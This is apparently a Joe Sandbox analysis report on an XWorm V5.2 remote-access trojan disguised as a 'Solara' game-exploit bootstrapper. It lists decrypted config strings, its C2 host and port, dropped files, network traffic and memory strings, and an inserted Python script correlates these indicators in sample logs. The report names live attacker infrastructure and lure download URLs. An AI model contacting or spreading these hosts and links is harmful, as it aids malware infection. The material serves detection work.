Source: C:\Users\user\AppData\Roaming\not rat.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 91%
Source: sDKRz09zM7.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\not rat.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svchost.exe | Joe Sandbox ML: detected
Source: sDKRz09zM7.exe | Joe Sandbox ML: detected
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: award-adware.gl.at.ply.gg
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: 8848
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: <123456789>
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: <Xwormmm>
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: XWorm V5.2
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: USB.exe
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: %AppData%
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack | String decryptor: svchost.exe
Source: sDKRz09zM7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: sDKRz09zM7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.PDB source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42B8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdbRSDSC source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp, WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdbH source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: b77a5c561934e089stem.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42C5000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Runtime.Serialization.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdbP source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr

                          Networking

                          barindex
                          Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49720 -> 147.185.221.24:8848
                          Source: Malware configuration extractor | URLs: award-adware.gl.at.ply.gg
                          Source: Yara match | File source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Source: global traffic | TCP traffic: 192.168.2.8:49720 -> 147.185.221.24:8848
                          Source: global traffic | HTTP traffic detected: GET /asset/discord.json HTTP/1.1; Host: getsolara.dev; Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /api/endpoint.json HTTP/1.1; Host: getsolara.dev
                          Source: global traffic | HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1; Host: clientsettings.roblox.com; Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1; Host: www.nodejs.org; Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
                          Source: Joe Sandbox View | IP Address: 208.95.112.1
                          Source: Joe Sandbox View | IP Address: 128.116.119.3
                          Source: Joe Sandbox View | ASN Name: SALSGIVERUS
                          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknown | DNS query: name: ip-api.com
                          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.93.27:443
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 events)
                          Source: global traffic | DNS traffic detected: DNS query: getsolara.dev
                          Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                          Source: global traffic | DNS traffic detected: DNS query: clientsettings.roblox.com
                          Source: global traffic | DNS traffic detected: DNS query: www.nodejs.org
                          Source: global traffic | DNS traffic detected: DNS query: nodejs.org
                          Source: global traffic | DNS traffic detected: DNS query: award-adware.gl.at.ply.gg
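The network indicators above (the XWorm C2 host award-adware.gl.at.ply.gg, the beacon to 147.185.221.24:8848/tcp, and the ip-api.com `/line/?fields=hosting` lookup the sample uses to check whether it runs on hosting/datacenter space) are enough to build a simple correlation rule. The block below is an added example written for this page, not part of the Joe Sandbox report or of the malware; it assumes Zeek-style column names (`id.orig_h`, `id.resp_h`, `id.resp_p`, `query`, `host`, `uri`), and the log rows it scans are constructed: 192.168.2.8 reproduces the sequence the report shows, while 192.168.2.20 and 192.168.2.30 are invented hosts used to show the non-matching and partial-match cases.

```python
"""Correlate the report's network IOCs over Zeek-style DNS / conn / HTTP rows.

Added example. Indicator values are the ones listed in the report's Networking
section; all log rows below are constructed for illustration.
"""
from dataclasses import dataclass

# Indicators as listed in the report (not invented).
C2_HOSTS = {"award-adware.gl.at.ply.gg"}
C2_ENDPOINTS = {("147.185.221.24", 8848, "tcp")}
# The sample asks ip-api.com whether it runs on hosting/datacenter space before
# it beacons; the request itself is a usable (if low-confidence) indicator.
HOSTING_CHECK_HOST = "ip-api.com"
HOSTING_CHECK_URI = "/line/?fields=hosting"


@dataclass(frozen=True)
class Finding:
    kind: str    # "c2-dns", "c2-conn" or "hosting-check"
    src: str     # internal host that produced the event
    detail: str  # matched value, for the analyst


def rows(header, values):
    """Turn a header list and value tuples into dicts, like a Zeek TSV reader."""
    return [dict(zip(header, v)) for v in values]


# Constructed sample logs: one infected host (192.168.2.8, as in the report),
# one host that only resolved the C2 name (.30), one with unrelated traffic (.20).
DNS_ROWS = rows(["ts", "id.orig_h", "query"], [
    ("1732787401.1", "192.168.2.8", "award-adware.gl.at.ply.gg."),
    ("1732787402.3", "192.168.2.8", "ip-api.com"),
    ("1732787410.0", "192.168.2.20", "getsolara.dev"),
    ("1732787420.7", "192.168.2.30", "AWARD-ADWARE.gl.at.ply.gg"),
])
CONN_ROWS = rows(["ts", "id.orig_h", "id.resp_h", "id.resp_p", "proto"], [
    ("1732787403.0", "192.168.2.8", "147.185.221.24", "8848", "tcp"),
    ("1732787411.2", "192.168.2.20", "104.21.93.27", "443", "tcp"),
    ("1732787415.9", "192.168.2.20", "147.185.221.24", "443", "tcp"),
])
HTTP_ROWS = rows(["ts", "id.orig_h", "host", "uri"], [
    ("1732787402.8", "192.168.2.8", "ip-api.com", "/line/?fields=hosting"),
    ("1732787412.4", "192.168.2.20", "getsolara.dev", "/api/endpoint.json"),
])


def scan_dns(dns_rows):
    # Case-insensitive, trailing-dot tolerant match on the C2 hostname.
    return [Finding("c2-dns", r["id.orig_h"], r["query"])
            for r in dns_rows
            if r["query"].lower().rstrip(".") in C2_HOSTS]


def scan_conn(conn_rows):
    # Match the exact C2 socket only: the same address on another port is not
    # flagged, since it may be shared hosting or tunnel infrastructure.
    return [Finding("c2-conn", r["id.orig_h"],
                    f"{r['id.resp_h']}:{r['id.resp_p']}/{r['proto']}")
            for r in conn_rows
            if (r["id.resp_h"], int(r["id.resp_p"]), r["proto"]) in C2_ENDPOINTS]


def scan_http(http_rows):
    return [Finding("hosting-check", r["id.orig_h"], r["host"] + r["uri"])
            for r in http_rows
            if r["host"].lower() == HOSTING_CHECK_HOST
            and r["uri"].startswith(HOSTING_CHECK_URI)]


def correlate(findings):
    """Per source host: 'high' when the hosting check accompanies C2 contact
    (the full sequence this sample shows), 'medium' for C2 contact alone,
    'low' for the hosting check alone (legitimate tools also query ip-api.com)."""
    kinds = {}
    for f in findings:
        kinds.setdefault(f.src, set()).add(f.kind)
    verdict = {}
    for src, k in kinds.items():
        c2 = bool(k & {"c2-dns", "c2-conn"})
        check = "hosting-check" in k
        verdict[src] = "high" if c2 and check else "medium" if c2 else "low"
    return verdict


if __name__ == "__main__":
    all_findings = scan_dns(DNS_ROWS) + scan_conn(CONN_ROWS) + scan_http(HTTP_ROWS)
    for f in all_findings:
        print(f"{f.kind:14} {f.src:14} {f.detail}")
    print(correlate(all_findings))
```

Two caveats when turning this into a production rule: the hostname sits under ply.gg, a tunneling service's domain, so the resolved address is a relay that can change between samples and should be treated as secondary to the hostname; and the ip-api.com request only raises confidence when it co-occurs with C2 indicators, which is why `correlate` never rates it above "low" on its own.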
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:64632
                          Source: svchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/STS
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106CAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/STS&lt;/ds:KeyName&gt;&lt;/ds:KeyInfo&gt;
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                          Source: svchost.exe, 0000000E.00000003.1617937545.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1617937545.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616358062.0000029107A98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb:pp
                          Source: svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb_
                          Source: svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb_sn
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://clientsettings.roblox.com
                          Source: svchost.exe, 0000000E.00000002.2615972777.0000029107A13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                          Source: svchost.exe, 0000000E.00000003.1680341835.0000029107553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1647116196.0000029107553000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecuri
                          Source: svchost.exe, 0000000E.00000003.1651775544.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdYBwk=
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdt:RequestedU
                          Source: svchost.exe, 0000000E.00000003.1651775544.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd#sha
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xml
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAA
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAoADIVfOz
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsde:Se
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
                          Source: svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdouroOOoD
                          Source: svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdthm=
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edge-term4-lhr2.roblox.com
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://getsolara.dev
                          Source: sDKRz09zM7.exe, 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, not rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, not rat.exe, 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, not rat.exe.0.dr, svchost.exe.2.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                          Source: BootstrapperV1.23_ModdedByHisako.exe.0.dr | String found in binary or memory: http://james.newtonking.com/projects/json
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nodejs.org
                          Source: powershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                          Source: svchost.exe, 0000000E.00000002.2614689488.0000029106CB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://passport.net/tb
                          Source: powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft.
                          Source: powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy1p
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: svchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: svchost.exe, 0000000E.00000003.1617937545.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1617937545.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107555000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614824394.0000029106CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustc
                          Source: svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustp
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1448022364.000001A9873F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D16F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863871000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: Amcache.hve.12.dr | String found in binary or memory: http://upx.sf.net
                          Source: powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000008.00000002.1617877847.000001D5E9C30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                          Source: powershell.exe, 00000005.00000002.1478161767.000001A99FA9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1842400688.000001D2688A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.nodejs.org
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBC6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Sola
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solao
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                          Source: svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
